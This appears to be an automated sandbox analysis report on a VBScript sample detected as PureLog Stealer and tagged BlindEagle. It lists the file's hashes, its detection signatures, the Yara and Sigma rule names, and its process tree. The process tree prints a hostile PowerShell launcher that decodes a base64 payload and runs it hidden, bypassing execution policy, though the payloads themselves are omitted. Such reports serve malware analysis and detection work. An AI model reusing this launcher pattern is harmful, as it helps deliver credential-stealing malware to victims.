Windows
Analysis Report
kz1fEn2R9Z.vbs
Overview
General Information
Field | Value
---|---
Sample name | kz1fEn2R9Z.vbs (renamed because the original name is a hash value)
Original sample name | 80e7c85eeb0a57e9f50e7d84e0eb1b2f2230837b53080d24696fab7373e9bc03.vbs
Analysis ID | 1523834
MD5 | 10a145cb87654a33c6c0beda947466b8
SHA1 | a504192f1b5ac44e6e49b4bc9ef660220c604469
SHA256 | 80e7c85eeb0a57e9f50e7d84e0eb1b2f2230837b53080d24696fab7373e9bc03
Tags | BlindEagle, vbs, user-JAMESWT_MHT
Detection
PureLog Stealer
Field | Value
---|---
Score | 100
Range | 0 - 100
Whitelisted | false
Confidence | 100%
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected PureLog Stealer
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 7548, cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\kz1fEn2R9Z.vbs", MD5: A47CBE969EA935BDD3AB568BB126BC80)
- powershell.exe (PID: 7600, cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[long base64-encoded payload omitted]';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 7608, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7768, cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "[long obfuscated string-concatenation payload omitted]", MD5: 04029E121A0CFA5991749937DD22A1D9)
No configs have been found
Source | Rule | Description | Author | Strings
---|---|---|---|---
| JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
| JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
Source | Rule | Description | Author | Strings
---|---|---|---|---
| JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
| JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
| JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
| JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
System Summary
Source: | Author: Florian Roth (Nextron Systems)